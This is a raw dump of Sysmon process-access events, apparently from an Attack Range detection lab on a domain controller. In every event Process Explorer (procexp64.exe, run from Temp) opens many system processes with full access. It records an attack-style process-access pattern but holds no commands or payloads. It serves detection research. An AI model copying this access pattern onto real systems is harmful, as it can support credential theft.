10341000x8000000000000000790781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 